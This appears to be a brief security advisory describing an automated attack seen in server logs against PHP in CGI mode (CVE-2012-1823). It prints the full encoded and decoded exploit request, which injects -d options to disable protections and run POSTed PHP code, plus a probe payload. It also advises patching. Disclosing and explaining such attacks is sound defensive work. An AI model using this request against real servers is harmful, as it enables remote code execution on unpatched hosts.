During analysis of our logs we noticed that an automated attack against PHP is going on, using a vulnerability in PHP.
Attacker is trying to make use of CVE-2012-1823, this only applies if your PHP is used in CGI mode (mod_php is not vulnerable to this).
POST /%70%68%70%70%61%74%68/%70%68%70?%2D%64+%61%6C%6C%6F%77%5F%75%72%6C%5F%69%6E%63%6C%75%64%65%3D%6F%6E+%2D%64+%73%61%66%65%5F%6D%6F%64%65%3D%6F%66%66+%2D%64+%73%75%68%6F%73%69%6E%2E%73%69%6D%75%6C%61%74%69%6F%6E%3D%6F%6E+%2D%64+%64%69%73%61%62%6C%65%5F%66%75%6E%63%74%69%6F%6E%73%3D%22%22+%2D%64+%6F%70%65%6E%5F%62%61%73%65%64%69%72%3D%6E%6F%6E%65+%2D%64+%61%75%74%6F%5F%70%72%65%70%65%6E%64%5F%66%69%6C%65%3D%70%68%70%3A%2F%2F%69%6E%70%75%74+%2D%6E
Decoding the URL gives:
/phppath/php?-d allow_url_include=on -d safe_mode=off -d suhosin.simulation=on -d disable_functions="" -d open_basedir=none -d auto_prepend_file=php://input -n
Using -d parameter injection to PHP binary attacker disables various protection mechanisms your PHP might have in place and executes PHP code directly by using auto_prepend_file (automatically executes PHP code before processing any PHP file), while php://input is a stream of POST request data.
POST content :
<?php echo "Content-Type:text/html\r\n\r\n";echo "bun4".php_uname()."st0p";exit; ?>
At moment this content not is harmfull, only testing is server vulnerability!
If you’re using a vulnerable version of PHP, update it ASAP, also look for Server API line there, if it does not contain something with CGI you should be safe for the moment, but using an obsolete PHP version is never good.